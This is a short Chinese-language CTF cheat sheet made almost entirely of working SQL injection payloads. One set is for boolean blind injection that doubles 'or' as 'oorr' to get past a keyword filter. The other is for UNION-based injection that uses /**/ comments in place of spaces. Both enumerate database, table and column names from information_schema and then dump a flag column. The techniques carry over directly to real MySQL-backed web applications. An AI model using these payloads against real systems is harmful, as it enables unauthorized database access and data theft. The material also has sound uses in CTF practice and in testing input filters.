0x01 替换了or、不能使用,、盲注
数据库长度
"0'oorr((length(database()))=%s)oorr'0" % (x)
数据库名
"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" % (x+1, y)
表名
"0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)='ctf_sql_bool_blind')='%s')oorr'0" % (x+1, y)
列名
"0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0" % (x+1, y)
dump
"0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0" % (x+1, y)
过滤空格、括号、有回显| 简单的sql注入2
查看库
1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
查看有哪些表,1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
查看有哪些列:1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/'1'='1
dump
1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1
网友评论